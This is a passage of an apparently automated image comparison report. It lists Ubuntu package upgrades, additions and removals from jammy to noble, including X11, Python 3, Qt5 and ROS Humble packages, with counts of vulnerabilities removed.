♾️	libxcb-render-util0	0.3.9-1build3	0.3.9-1build4
♾️	libxcb-render0	1.14-3ubuntu3	1.15-1ubuntu2
➕	libxcb-render0-dev		1.15-1ubuntu2
♾️	libxcb-shape0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-shm0	1.14-3ubuntu3	1.15-1ubuntu2
➕	libxcb-shm0-dev		1.15-1ubuntu2
♾️	libxcb-sync1	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-util1	0.4.0-1build2	0.4.0-1build3
♾️	libxcb-xfixes0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-xinerama0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-xinput0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-xkb1	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb1	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb1-dev	1.14-3ubuntu3	1.15-1ubuntu2
➕	libxcomposite-dev		1:0.4.5-1build3
♾️	libxcomposite1	1:0.4.5-1build2	1:0.4.5-1build3
♾️	libxcursor-dev	1:1.2.0-2build4	1:1.2.1-1build1
♾️	libxcursor1	1:1.2.0-2build4	1:1.2.1-1build1
♾️	libxcvt0	0.1.1-3	0.1.2-1build1
➕	libxdamage-dev		1:1.1.6-1build1
♾️	libxdamage1	1:1.1.5-2build2	1:1.1.6-1build1
♾️	libxdmcp-dev	1:1.1.3-0ubuntu5	1:1.1.3-0ubuntu6
♾️	libxdmcp6	1:1.1.3-0ubuntu5	1:1.1.3-0ubuntu6
♾️	libxerces-c-dev	3.2.3+debian-3ubuntu0.1	3.2.4+debian-1.2ubuntu2
➖	libxerces-c3.2	3.2.3+debian-3ubuntu0.1
➕	libxerces-c3.2t64		3.2.4+debian-1.2ubuntu2
♾️	libxext-dev	2:1.3.4-1build1	2:1.3.4-1build2
♾️	libxext6	2:1.3.4-1build1	2:1.3.4-1build2
♾️	libxfixes-dev	1:6.0.0-1	1:6.0.0-2build1
♾️	libxfixes3	1:6.0.0-1	1:6.0.0-2build1
♾️	libxfont2	1:2.0.5-1build1	1:2.0.6-1build1
♾️	libxft-dev	2.3.4-1	2.3.6-1build1
♾️	libxft2	2.3.4-1	2.3.6-1build1
♾️	libxi-dev	2:1.8-1build1	2:1.8.1-1build1
♾️	libxi6	2:1.8-1build1	2:1.8.1-1build1
♾️	libxinerama-dev	2:1.1.4-3	2:1.1.4-3build1
♾️	libxinerama1	2:1.1.4-3	2:1.1.4-3build1
♾️	libxkbcommon-dev	1.4.0-1	1.6.0-1build1
♾️	libxkbcommon-x11-0	1.4.0-1	1.6.0-1build1
♾️	libxkbcommon0	1.4.0-1	1.6.0-1build1
♾️	libxkbfile1	1:1.1.0-1build3	1:1.1.0-1build4
♾️	libxml2	2.9.13+dfsg-1ubuntu0.10	2.9.14+dfsg-1.3ubuntu3.7
		Removed vulnerabilities (4):
♾️	libxml2-dev	2.9.13+dfsg-1ubuntu0.10	2.9.14+dfsg-1.3ubuntu3.7
♾️	libxml2-utils	2.9.13+dfsg-1ubuntu0.10	2.9.14+dfsg-1.3ubuntu3.7
♾️	libxmlb2	0.3.6-2build1	0.3.18-1
♾️	libxmu-dev	2:1.1.3-3	2:1.1.3-3build2
♾️	libxmu-headers	2:1.1.3-3	2:1.1.3-3build2
♾️	libxmu6	2:1.1.3-3	2:1.1.3-3build2
♾️	libxmuu1	2:1.1.3-3	2:1.1.3-3build2
♾️	libxnvctrl0	510.47.03-0ubuntu1	510.47.03-0ubuntu4.24.04.1
♾️	libxpm-dev	1:3.5.12-1ubuntu0.22.04.2	1:3.5.17-1build2
♾️	libxpm4	1:3.5.12-1ubuntu0.22.04.2	1:3.5.17-1build2
♾️	libxrandr-dev	2:1.5.2-1build1	2:1.5.2-2build1
♾️	libxrandr2	2:1.5.2-1build1	2:1.5.2-2build1
♾️	libxrender-dev	1:0.9.10-1build4	1:0.9.10-1.1build1
♾️	libxrender1	1:0.9.10-1build4	1:0.9.10-1.1build1
♾️	libxshmfence1	1.3-1build4	1.3-1build5
➖	libxsimd-dev	7.6.0-2
➖	libxslt1-dev	1.1.34-4ubuntu0.22.04.4
♾️	libxslt1.1	1.1.34-4ubuntu0.22.04.4	1.1.39-0exp1ubuntu0.24.04.3
		Removed vulnerabilities (1):
♾️	libxss-dev	1:1.2.3-1build2	1:1.2.3-1build3
♾️	libxss1	1:1.2.3-1build2	1:1.2.3-1build3
➕	libxstring-perl		0.005-2build3
♾️	libxt-dev	1:1.2.1-1	1:1.2.1-1.2build1
➖	libxt6	1:1.2.1-1
➕	libxt6t64		1:1.2.1-1.2build1
➕	libxtst-dev		2:1.2.3-1.1build1
♾️	libxtst6	2:1.2.3-1build4	2:1.2.3-1.1build1
♾️	libxv-dev	2:1.0.11-1build2	2:1.0.11-1.1build1
♾️	libxv1	2:1.0.11-1build2	2:1.0.11-1.1build1
♾️	libxvidcore4	2:1.3.7-1	2:1.3.7-1build1
♾️	libxxf86vm-dev	1:1.1.4-1build3	1:1.1.4-1build4
♾️	libxxf86vm1	1:1.1.4-1build3	1:1.1.4-1build4
♾️	libxxhash0	0.8.1-1	0.8.2-2build1
➕	libyajl2		2.1.0-5build1
♾️	libyaml-0-2	0.2.2-1build2	0.2.5-1build1
♾️	libyaml-cpp-dev	0.7.0+dfsg-8build1	0.8.0+dfsg-6build1
➖	libyaml-cpp0.7	0.7.0+dfsg-8build1
➕	libyaml-cpp0.8		0.8.0+dfsg-6build1
♾️	libyaml-dev	0.2.2-1build2	0.2.5-1build1
➖	libz3-4	4.8.12-1
➖	libzbar0	0.23.92-4build2
➕	libzbar0t64		0.23.93-4build3
♾️	libzimg2	3.0.3+ds1-1	3.0.5+ds1-1build1
♾️	libzip-dev	1.7.3-1ubuntu2	1.7.3-1.1ubuntu2
➖	libzip4	1.7.3-1ubuntu2
➕	libzip4t64		1.7.3-1.1ubuntu2
➕	libzix-0-0		0.4.2-2build1
♾️	libzmq3-dev	4.3.4-2	4.3.5-1build2
♾️	libzmq5	4.3.4-2	4.3.5-1build2
♾️	libzstd-dev	1.4.8+dfsg-3build1	1.5.5+dfsg2-2build1.1
♾️	libzstd1	1.4.8+dfsg-3build1	1.5.5+dfsg2-2build1.1
♾️	libzvbi-common	0.2.35-19	0.2.42-2
➖	libzvbi0	0.2.35-19
➕	libzvbi0t64		0.2.42-2
➕	libzxing3		2.2.1-3
➖	libzxingcore1	1.2.0-1
➖	libzzip-0-13	0.13.72+dfsg.1-1.1
➕	libzzip-0-13t64		0.13.72+dfsg.1-1.2build1
♾️	linux-libc-dev	5.15.0-164.174	6.8.0-101.101
		Removed vulnerabilities (118):
♾️	linux-libc-dev-armhf-cross	5.15.0-22.22cross3	6.8.0-25.25cross1
♾️	locales	2.35-0ubuntu3.11	2.39-0ubuntu8.7
		Removed vulnerabilities (3):
♾️	login	1:4.8.1-2ubuntu2.2	1:4.13+dfsg1-4ubuntu3.2
♾️	logsave	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
➖	lsb-base	11.1.0ubuntu4
♾️	lsb-release	11.1.0ubuntu4	12.0-2
♾️	lto-disabled-list	24	47
➕	lttng-tools		2.13.11-2.1build4
♾️	m4	1.4.18-5ubuntu2	1.4.19-4build1
➖	mailcap	3.70+nmu1ubuntu1
♾️	make	4.3-4.1build1	4.3-4.1build2
♾️	mawk	1.3.4.20200120-3	1.3.4.20240123-1build1
♾️	media-types	7.0.0	10.1.0
➕	mercurial		6.7.2-1ubuntu2.2
➕	mercurial-common		6.7.2-1ubuntu2.2
➕	mesa-libgallium		25.2.8-0ubuntu0.24.04.1
➖	mime-support	3.66
♾️	mount	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	mpi-default-bin	1.14	1.15build1
♾️	mpi-default-dev	1.14	1.15build1
♾️	mysql-common	5.8+1.0.8	5.8+1.1.0build1
♾️	ncurses-base	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
♾️	ncurses-bin	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
➕	netbase		6.4
♾️	ocl-icd-libopencl1	2.2.14-3	2.3.2-1build1
➖	openjdk-11-jdk	11.0.29+7-1ubuntu1~22.04
➖	openjdk-11-jdk-headless	11.0.29+7-1ubuntu1~22.04
➖	openjdk-11-jre	11.0.29+7-1ubuntu1~22.04
		Removed vulnerabilities (4):
➖	openjdk-11-jre-headless	11.0.29+7-1ubuntu1~22.04
➕	openjdk-21-jdk		21.0.10+7-1~24.04
➕	openjdk-21-jdk-headless		21.0.10+7-1~24.04
➕	openjdk-21-jre		21.0.10+7-1~24.04
➕	openjdk-21-jre-headless		21.0.10+7-1~24.04
♾️	openmpi-bin	4.1.2-2ubuntu1	4.1.6-7ubuntu2
♾️	openmpi-common	4.1.2-2ubuntu1	4.1.6-7ubuntu2
♾️	openssh-client	1:8.9p1-3ubuntu0.13	1:9.6p1-3ubuntu13.14
♾️	openssl	3.0.2-0ubuntu1.20	3.0.13-0ubuntu3.7
		Removed vulnerabilities (8):
♾️	packagekit	1.2.5-2ubuntu3	1.2.8-2ubuntu1.4
➕	pango1.0-tools		1.52.1+ds-1build1
♾️	passwd	1:4.8.1-2ubuntu2.2	1:4.13+dfsg1-4ubuntu3.2
♾️	patch	2.7.6-7build2	2.7.6-7build3
♾️	perl	5.34.0-3ubuntu1.5	5.38.2-3.2ubuntu0.2
♾️	perl-base	5.34.0-3ubuntu1.5	5.38.2-3.2ubuntu0.2
➖	perl-modules-5.34	5.34.0-3ubuntu1.5
➕	perl-modules-5.38		5.38.2-3.2ubuntu0.2
♾️	pinentry-curses	1.1.1-1build2	1.2.1-3ubuntu5
➖	pkexec	0.105-33
♾️	pkg-config	0.29.2-1ubuntu3	1.8.1-2build1
➕	pkgconf		1.8.1-2build1
➕	pkgconf-bin		1.8.1-2build1
➖	policykit-1	0.105-33
♾️	polkitd	0.105-33	124-2ubuntu1.24.04.2
♾️	ppp	2.4.9-1+1ubuntu3	2.4.9-1+1.1ubuntu4
♾️	procps	2:3.3.17-6ubuntu2.1	2:4.0.4-4ubuntu3.2
♾️	proj-data	8.2.1-1	9.4.0-1build2
♾️	protobuf-compiler	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
♾️	pybind11-dev	2.9.1-2	2.11.1-2
♾️	pydocstyle	6.1.1-1	6.3.0-1.1
♾️	pyqt5-dev	5.15.6+dfsg-1ubuntu3	5.15.10+dfsg-1build6

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

♾️	python-apt-common	2.4.0ubuntu4.1	2.7.7ubuntu5.2
➖	python-babel-localedata	2.8.0+dfsg.1-7
➖	python-is-python3	3.9.2-2
♾️	python-matplotlib-data	3.5.1-2build1	3.6.3-1ubuntu5
♾️	python3	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	python3-appdirs	1.4.4-2	1.4.4-4
♾️	python3-apt	2.4.0ubuntu4.1	2.7.7ubuntu5.2
♾️	python3-argcomplete	1.8.1-1.5	3.1.4-1ubuntu0.1
♾️	python3-attr	21.2.0-1ubuntu1	23.2.0-2
➖	python3-babel	2.8.0+dfsg.1-7
➖	python3-beniget	0.4.1-2
♾️	python3-blinker	1.4+dfsg1-0.4	1.7.0-1
➕	python3-breezy		3.3.5-6build2
♾️	python3-brotli	1.0.9-2build6	1.1.0-2build2
♾️	python3-cairo	1.20.1-3build1	1.25.1-2build2
♾️	python3-cffi-backend	1.15.0-1build2	1.16.0-2build1
♾️	python3-click	8.0.3-1	8.1.6-2
♾️	python3-colcon-ros	0.5.0-100	0.5.0+upstream-1
♾️	python3-colorama	0.4.4-1	0.4.6-4
➕	python3-configobj		5.0.8-3
➕	python3-contourpy		1.0.7-2build1
♾️	python3-cryptography	3.4.8-1ubuntu2.2	41.0.7-4ubuntu0.1
♾️	python3-cycler	0.11.0-1	0.11.0-2
♾️	python3-dateutil	2.8.1-6	2.8.2-3ubuntu1
♾️	python3-dbus	1.2.18-3build1	1.3.2-5build3
♾️	python3-decorator	4.4.2-0ubuntu1	5.1.1-5
➕	python3-deprecated		1.2.14-1
♾️	python3-dev	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	python3-distlib	0.3.4-1	0.3.8-1
♾️	python3-distro	1.7.0-1	1.9.0-1
➖	python3-distutils	3.10.8-1~22.04
♾️	python3-docutils	0.17.1+dfsg-2	0.20.1+dfsg-3
➕	python3-dulwich		0.21.6-1build2
➕	python3-fastbencode		0.2-1build2
♾️	python3-flake8	4.0.1-2	7.0.0-1
➕	python3-flake8-builtins		2.1.0-1
➕	python3-flake8-comprehensions		3.14.0-1
➕	python3-flake8-docstrings		1.6.0-2
➕	python3-flake8-import-order		0.18.2-2
➕	python3-flake8-quotes		3.4.0-1
♾️	python3-fonttools	4.29.1-2build1	4.46.0-1build2
♾️	python3-fs	2.4.12-1	2.4.16-3
➖	python3-gast	0.5.2-2
♾️	python3-gi	3.42.1-0ubuntu1	3.48.2-1
♾️	python3-gz-math7	7.5.1-1~jammy	7.5.1-1~noble
♾️	python3-gz-msgs10	10.3.2-1~jammy	10.3.2-1~noble
♾️	python3-gz-sim8	8.10.0-1~jammy	8.10.0-1~noble
♾️	python3-gz-transport13	13.5.0-1~jammy	13.5.0-1~noble
♾️	python3-httplib2	0.20.2-2	0.20.4-3
♾️	python3-importlib-metadata	4.6.4-1	4.12.0-1
➖	python3-jeepney	0.7.1-3
♾️	python3-jinja2	3.0.3-1ubuntu0.4	3.1.2-1ubuntu1.3
♾️	python3-jwt	2.3.0-1ubuntu0.2	2.7.0-1
➖	python3-keyring	23.5.0-1
♾️	python3-kiwisolver	1.3.2-1build1	1.4.4-2build1
♾️	python3-lark	1.1.1-1	1.1.9-1
♾️	python3-launchpadlib	1.10.16-1	1.11.0-6
♾️	python3-lazr.restfulclient	0.14.4-1	0.14.6-1
♾️	python3-lazr.uri	1.0.6-2	1.0.6-3
➖	python3-lib2to3	3.10.8-1~22.04
♾️	python3-lxml	4.8.0-1build1	5.2.1-1
♾️	python3-lz4	3.1.3+dfsg-1build3	4.0.2+dfsg-1build4
♾️	python3-markupsafe	2.0.1-2build1	2.1.5-1build2
♾️	python3-matplotlib	3.5.1-2build1	3.6.3-1ubuntu5
♾️	python3-mccabe	0.6.1-3	0.7.0-1
➕	python3-merge3		0.0.8-1
♾️	python3-minimal	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	python3-more-itertools	8.10.0-2	10.2.0-1
♾️	python3-mpi4py	3.1.3-1build2	3.1.5-5ubuntu2
♾️	python3-mpmath	1.2.1-2	1.2.1-3
➖	python3-netifaces	0.11.0-1build2
♾️	python3-notify2	0.3-4	0.3-5
♾️	python3-numpy	1:1.21.5-1ubuntu22.04.1	1:1.26.4+ds-6ubuntu1
♾️	python3-oauthlib	3.2.0-1ubuntu0.1	3.2.2-1
♾️	python3-opencv	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
♾️	python3-packaging	21.3-1	24.0-1
➕	python3-patiencediff		0.2.13-1build2
♾️	python3-pexpect	4.8.0-2ubuntu1	4.9-2
♾️	python3-pil	9.0.1-1ubuntu0.3	10.2.0-1ubuntu1
♾️	python3-pil.imagetk	9.0.1-1ubuntu0.3	10.2.0-1ubuntu1
♾️	python3-pip	22.0.2+dfsg-1ubuntu0.7	24.0+dfsg-1ubuntu1.3
➕	python3-pip-whl		24.0+dfsg-1ubuntu1.3
♾️	python3-pkg-resources	59.6.0-1.2ubuntu0.22.04.3	68.1.2-2ubuntu1.2
♾️	python3-pluggy	0.13.0-7.1	1.4.0-1
➖	python3-ply	3.11-5
♾️	python3-protobuf	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
♾️	python3-psutil	5.9.0-1build1	5.9.8-2build2
♾️	python3-ptyprocess	0.7.0-3	0.7.0-5
➖	python3-py	1.10.0-1
♾️	python3-pybind11	2.9.1-2	2.11.1-2
♾️	python3-pycodestyle	2.8.0-2	2.11.1-1
♾️	python3-pydocstyle	6.1.1-1	6.3.0-1.1
♾️	python3-pydot	1.4.2-1build1	1.4.2-2
♾️	python3-pyflakes	2.4.0-2	3.2.0-1
♾️	python3-pygments	2.11.2+dfsg-2ubuntu0.1	2.17.2+dfsg-1
♾️	python3-pykdl	1.5.1-2build1	1.5.1-4build1
♾️	python3-pyparsing	2.4.7-1	3.1.1-1
♾️	python3-pyqt5	5.15.6+dfsg-1ubuntu3	5.15.10+dfsg-1build6
♾️	python3-pyqt5.qtsvg	5.15.6+dfsg-1ubuntu3	5.15.10+dfsg-1build6
♾️	python3-pyqt5.sip	12.9.1-1build1	12.13.0-1build3
♾️	python3-pyside2.qtcore	5.15.2-2build2	5.15.13-1
♾️	python3-pyside2.qtgui	5.15.2-2build2	5.15.13-1
♾️	python3-pyside2.qtsvg	5.15.2-2build2	5.15.13-1
♾️	python3-pyside2.qtwidgets	5.15.2-2build2	5.15.13-1
♾️	python3-pytest	6.2.5-1ubuntu2	7.4.4-1
➖	python3-pythran	0.10.0+ds2-1
♾️	python3-rencode	1.0.6-2build1	1.0.6-2build5
♾️	python3-roman	3.3-1	3.3-3
♾️	python3-rospkg-modules	1.6.0-1	1.6.1-1
♾️	python3-scipy	1.8.0-1exp2ubuntu1	1.11.4-6build1
♾️	python3-sdformat14	14.8.0-1~jammy	14.8.0-1~noble
➖	python3-secretstorage	3.3.1-1
➖	python3-serial	3.5-1
♾️	python3-setuptools	59.6.0-1.2ubuntu0.22.04.3	68.1.2-2ubuntu1.2
➕	python3-setuptools-whl		68.1.2-2ubuntu1.2
♾️	python3-sip	4.19.25+dfsg-3build1	4.19.25+dfsg-5build3
♾️	python3-sip-dev	4.19.25+dfsg-3build1	4.19.25+dfsg-5build3
♾️	python3-six	1.16.0-3ubuntu1	1.16.0-4
♾️	python3-snowballstemmer	2.2.0-1build1	2.2.0-4build1
♾️	python3-software-properties	0.99.22.9	0.99.49.3
♾️	python3-sympy	1.9-1	1.12-7
♾️	python3-tk	3.10.8-1~22.04	3.12.3-0ubuntu1
➖	python3-toml	0.10.2-1
♾️	python3-tz	2022.1-1ubuntu0.22.04.1	2024.1-2
➕	python3-tzlocal		5.2-1.1
♾️	python3-ufolib2	0.13.1+dfsg1-1	0.16.0+dfsg1-1
♾️	python3-unicodedata2	14.0.0+ds-8	15.1.0+ds-1build1
➕	python3-urllib3		2.0.7-1ubuntu0.6
♾️	python3-vcstools	0.1.42-4	0.1.42-1
♾️	python3-vtk9	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
♾️	python3-wadllib	1.3.6-1	1.3.6-5
♾️	python3-wheel	0.37.1-2ubuntu0.22.04.1	0.42.0-2
➕	python3-wrapt		1.15.0-2build3
♾️	python3-wxgtk4.0	4.0.7+dfsg-13build1	4.2.1+dfsg-3build2
♾️	python3-yaml	5.4.1-1ubuntu1	6.0.1-2build2
♾️	python3-zipp	1.0.0-3ubuntu0.1	1.0.0-6ubuntu0.1
➖	python3.10	3.10.12-1~22.04.12
		Removed vulnerabilities (9):
➖	python3.10-dev	3.10.12-1~22.04.12
➖	python3.10-minimal	3.10.12-1~22.04.12
➕	python3.12		3.12.3-1ubuntu0.11
➕	python3.12-dev		3.12.3-1ubuntu0.11
➕	python3.12-minimal		3.12.3-1ubuntu0.11
➕	python3.12-venv		3.12.3-1ubuntu0.11
♾️	qdoc-qt5	5.15.3-1	5.15.13-1
♾️	qhelpgenerator-qt5	5.15.3-1	5.15.13-1
♾️	qml-module-qt-labs-folderlistmodel	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qt-labs-platform	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qml-module-qt-labs-settings	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtcharts	5.15.3-1	5.15.13-1
♾️	qml-module-qtgraphicaleffects	5.15.3-1	5.15.13-1
♾️	qml-module-qtqml	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtqml-models2	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtquick-controls	5.15.3-1	5.15.13-1
♾️	qml-module-qtquick-controls2	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qml-module-qtquick-dialogs	5.15.3-1	5.15.13-1
♾️	qml-module-qtquick-layouts	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtquick-privatewidgets	5.15.3-1	5.15.13-1
♾️	qml-module-qtquick-templates2	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qml-module-qtquick-window2	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtquick2	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qt5-assistant	5.15.3-1	5.15.13-1
♾️	qt5-qmake	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qt5-qmake-bin	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qt5-qmltooling-plugins	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qtattributionsscanner-qt5	5.15.3-1	5.15.13-1
♾️	qtbase5-dev	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qtbase5-dev-tools	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qtchooser	66-2build1	66-2build2
♾️	qtdeclarative5-dev	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qtdeclarative5-dev-tools	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qtquickcontrols2-5-dev	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qttools5-dev	5.15.3-1	5.15.13-1
♾️	qttools5-dev-tools	5.15.3-1	5.15.13-1
♾️	qttools5-private-dev	5.15.3-1	5.15.13-1
♾️	rake	13.0.6-2	13.0.6-3
♾️	rapidjson-dev	1.1.0+dfsg2-7	1.1.0+dfsg2-7.2
♾️	readline-common	8.1.2-1	8.2-4build1
➖	ros-humble-action-msgs	1.2.2-1jammy.20251108.175002
➖	ros-humble-action-tutorials-cpp	0.20.7-1jammy.20251120.082836
➖	ros-humble-action-tutorials-interfaces	0.20.7-1jammy.20251118.145629
➖	ros-humble-action-tutorials-py	0.20.7-1jammy.20251120.062407
➖	ros-humble-actionlib-msgs	4.9.0-1jammy.20251108.160534
➖	ros-humble-ament-cmake	1.3.12-1jammy.20250701.015401
➖	ros-humble-ament-cmake-auto	1.3.12-1jammy.20250701.015926
➖	ros-humble-ament-cmake-copyright	0.12.14-1jammy.20250719.000118
➖	ros-humble-ament-cmake-core	1.3.12-1jammy.20250701.005458
➖	ros-humble-ament-cmake-cppcheck	0.12.14-1jammy.20250719.001132
➖	ros-humble-ament-cmake-cpplint	0.12.14-1jammy.20250719.001131
➖	ros-humble-ament-cmake-export-definitions	1.3.12-1jammy.20250701.012646
➖	ros-humble-ament-cmake-export-dependencies	1.3.12-1jammy.20250701.013152
➖	ros-humble-ament-cmake-export-include-directories	1.3.12-1jammy.20250701.012659
➖	ros-humble-ament-cmake-export-interfaces	1.3.12-1jammy.20250701.013209
➖	ros-humble-ament-cmake-export-libraries	1.3.12-1jammy.20250701.012702
➖	ros-humble-ament-cmake-export-link-flags	1.3.12-1jammy.20250701.012703
➖	ros-humble-ament-cmake-export-targets	1.3.12-1jammy.20250701.013336
➖	ros-humble-ament-cmake-flake8	0.12.14-1jammy.20250719.000624
➖	ros-humble-ament-cmake-gen-version-h	1.3.12-1jammy.20250701.014830
➖	ros-humble-ament-cmake-gmock	1.3.12-1jammy.20250701.014927
➖	ros-humble-ament-cmake-gtest	1.3.12-1jammy.20250701.014335
➖	ros-humble-ament-cmake-include-directories	1.3.12-1jammy.20250701.012701
➖	ros-humble-ament-cmake-libraries	1.3.12-1jammy.20250701.012656
➖	ros-humble-ament-cmake-lint-cmake	0.12.14-1jammy.20250718.235141
➖	ros-humble-ament-cmake-pep257	0.12.14-1jammy.20250719.000858
➖	ros-humble-ament-cmake-pytest	1.3.12-1jammy.20250701.014401
➖	ros-humble-ament-cmake-python	1.3.12-1jammy.20250701.012821
➖	ros-humble-ament-cmake-ros	0.10.0-3jammy.20250719.004624
➖	ros-humble-ament-cmake-target-dependencies	1.3.12-1jammy.20250701.013402
➖	ros-humble-ament-cmake-test	1.3.12-1jammy.20250701.013421
➖	ros-humble-ament-cmake-uncrustify	0.12.14-1jammy.20250719.001136
➖	ros-humble-ament-cmake-version	1.3.12-1jammy.20250701.012904
➖	ros-humble-ament-cmake-xmllint	0.12.14-1jammy.20250719.001616
➖	ros-humble-ament-copyright	0.12.14-1jammy.20250718.232814
➖	ros-humble-ament-cppcheck	0.12.14-1jammy.20250718.230013
➖	ros-humble-ament-cpplint	0.12.14-1jammy.20250718.233807
➖	ros-humble-ament-flake8	0.12.14-1jammy.20250718.230926
➖	ros-humble-ament-index-cpp	1.4.0-2jammy.20250719.005004
➖	ros-humble-ament-index-python	1.4.0-2jammy.20250718.234622
➖	ros-humble-ament-lint	0.12.14-1jammy.20250718.225952
➖	ros-humble-ament-lint-auto	0.12.14-1jammy.20250718.230011
➖	ros-humble-ament-lint-cmake	0.12.14-1jammy.20250718.234628
➖	ros-humble-ament-lint-common	0.12.14-1jammy.20250719.003458
➖	ros-humble-ament-package	0.14.1-1jammy.20250522.030919
➖	ros-humble-ament-pep257	0.12.14-1jammy.20250718.231703
➖	ros-humble-ament-uncrustify	0.12.14-1jammy.20250718.233803
➖	ros-humble-ament-xmllint	0.12.14-1jammy.20250718.234603
➖	ros-humble-angles	1.15.0-1jammy.20250701.015952
➖	ros-humble-builtin-interfaces	1.2.2-1jammy.20251108.153234
➖	ros-humble-class-loader	2.2.0-3jammy.20251108.145042
➖	ros-humble-common-interfaces	4.9.0-1jammy.20251108.183642
➖	ros-humble-composition	0.20.7-1jammy.20251120.092938
➖	ros-humble-composition-interfaces	1.2.2-1jammy.20251108.155130
➖	ros-humble-console-bridge-vendor	1.4.1-1jammy.20250719.012940
➖	ros-humble-cv-bridge	3.2.1-1jammy.20251108.170742
➖	ros-humble-demo-nodes-cpp	0.20.7-1jammy.20251120.092939
➖	ros-humble-demo-nodes-cpp-native	0.20.7-1jammy.20251120.092942
➖	ros-humble-demo-nodes-py	0.20.7-1jammy.20251120.062628
➖	ros-humble-depthimage-to-laserscan	2.5.1-1jammy.20251120.163750
➖	ros-humble-desktop	0.10.0-1jammy.20251120.224151
➖	ros-humble-diagnostic-msgs	4.9.0-1jammy.20251108.164926
➖	ros-humble-diagnostic-updater	4.0.6-1jammy.20251120.093610
➖	ros-humble-domain-coordinator	0.10.0-3jammy.20250718.233247
➖	ros-humble-dummy-map-server	0.20.7-1jammy.20251120.062732
➖	ros-humble-dummy-robot-bringup	0.20.7-1jammy.20251120.184452
➖	ros-humble-dummy-sensors	0.20.7-1jammy.20251120.062954
➖	ros-humble-eigen-stl-containers	1.1.0-1jammy.20250701.021027
➖	ros-humble-eigen3-cmake-module	0.1.1-4jammy.20250719.001118
➖	ros-humble-example-interfaces	0.9.3-2jammy.20251108.180125
➖	ros-humble-examples-rclcpp-minimal-action-client	0.15.5-1jammy.20251120.095538
➖	ros-humble-examples-rclcpp-minimal-action-server	0.15.5-1jammy.20251120.095603
➖	ros-humble-examples-rclcpp-minimal-client	0.15.5-1jammy.20251120.095613
➖	ros-humble-examples-rclcpp-minimal-composition	0.15.5-1jammy.20251120.160834
➖	ros-humble-examples-rclcpp-minimal-publisher	0.15.5-1jammy.20251120.114808
➖	ros-humble-examples-rclcpp-minimal-service	0.15.5-1jammy.20251120.095622
➖	ros-humble-examples-rclcpp-minimal-subscriber	0.15.5-1jammy.20251120.114803
➖	ros-humble-examples-rclcpp-minimal-timer	0.15.5-1jammy.20251120.114806
➖	ros-humble-examples-rclcpp-multithreaded-executor	0.15.5-1jammy.20251120.114807
➖	ros-humble-examples-rclpy-executors	0.15.5-1jammy.20251120.090127
➖	ros-humble-examples-rclpy-minimal-action-client	0.15.5-1jammy.20251120.084734
➖	ros-humble-examples-rclpy-minimal-action-server	0.15.5-1jammy.20251120.084718
➖	ros-humble-examples-rclpy-minimal-client	0.15.5-1jammy.20251120.084720
➖	ros-humble-examples-rclpy-minimal-publisher	0.15.5-1jammy.20251120.090458
➖	ros-humble-examples-rclpy-minimal-service	0.15.5-1jammy.20251120.085235
➖	ros-humble-examples-rclpy-minimal-subscriber	0.15.5-1jammy.20251120.090453
➖	ros-humble-fastcdr	1.0.24-2jammy.20250701.013706
➖	ros-humble-fastrtps	2.6.10-1jammy.20250719.003736
➖	ros-humble-fastrtps-cmake-module	2.2.3-1jammy.20250924.083953
➖	ros-humble-foonathan-memory-vendor	1.2.0-3jammy.20250719.002738
➖	ros-humble-geographic-msgs	1.0.6-1jammy.20251108.170620
➖	ros-humble-geometry-msgs	4.9.0-1jammy.20251108.163244
➖	ros-humble-geometry2	0.25.17-1jammy.20251120.155456
➖	ros-humble-gmock-vendor	1.10.9006-1jammy.20250701.014458
➖	ros-humble-gtest-vendor	1.10.9006-1jammy.20250701.013855
➖	ros-humble-ignition-cmake2-vendor	0.0.2-2jammy.20250719.002740
➖	ros-humble-ignition-math6-vendor	0.0.2-2jammy.20250719.003244
